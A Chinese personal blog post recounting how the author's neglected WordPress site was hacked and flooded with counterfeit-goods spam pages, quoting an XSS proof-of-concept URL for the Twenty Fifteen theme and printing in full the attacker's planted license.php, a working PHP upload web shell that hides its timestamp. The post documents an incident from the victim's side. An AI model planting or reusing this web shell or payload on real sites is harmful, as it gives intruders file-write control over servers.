Alan Hou的个人博客

博客被入侵实录

网络上现在黑客行为无处不在,大公司也鲜有幸免者,频频被脱裤。前段时间Magento曝出高危漏洞,还有Wordpress的插件WordPress SEO by Yoast曝出存在SQL注入漏洞,今天看到Wordpress的默认主题竟然也存在着跨站脚本漏洞:
http:// site.com/wp-content/themes/twentyfifteen/genericons/example.html#1<img/ src=1 onerror= alert(1)>

于是前几天Alan的一个英文Wordpress站点也被攻击了,这个博客将近半年多没有打理,想必是未及时升级被人利用了之前的漏洞进行攻击。其实人在江湖谁能不挨刀呢,最让我无语的是这个黑客竟然上传了近两万个文件(html+js),差不多有两个G,这个站点布置在一个低配置的GoDaddy主机上,于是删文件花了我两个多小时。看来现在黑客也不好混呀,抓住一个就疯狂的掠夺。

文件都是一些Nike之类的仿牌,本人也不屑于去投诉什么的,做仿牌的也是苦海无涯啊,做大了就更麻烦了。

话说这个攻击就是利用漏洞在根目录添加了一个license.php文件,其实也就是用于处理上传文件的一个php脚本,代码如下文。

另外Google的灵敏度还是挺赞的,今天就收到了一封标题为[Webmaster Tools] Hacking suspected:http://www.domain.com的邮件,估计这种黑帽SEO手段在国外早就没什么效果了吧。

<html>
	<head>
		<meta http-equiv="Content-Type" content="text/html; charset=windows-utf-8">
		<title>utf</title>
	</head>
	<body>
		<?php
		print "<h1>#p@$c@#</h1>\n";
		echo "Your IP: ";
		echo $_SERVER['REMOTE_ADDR'];
		echo "<form method=\"post\" enctype=\"multipart/form-data\">\n";
		echo "<input type=\"file\" name=\"filename\"><br> \n";
		echo "<input type=\"submit\" value=\"LOAD\"><br>\n";
		echo "</form>\n";
		if(is_uploaded_file/*;*/($_FILES["filename"]["tmp_name"]))
			{
			move_uploaded_file/*;*/($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]);
			$file = $_FILES/*;*/["filename"]["name"];
			echo "<a href=\"$file\">$file</a>";
			} else {
			echo("empty");
			}
		$filename = $_SERVER[SCRIPT_FILENAME];
		touch/*;*/($filename, $time);
		?>
	</body>
</html>
退出移动版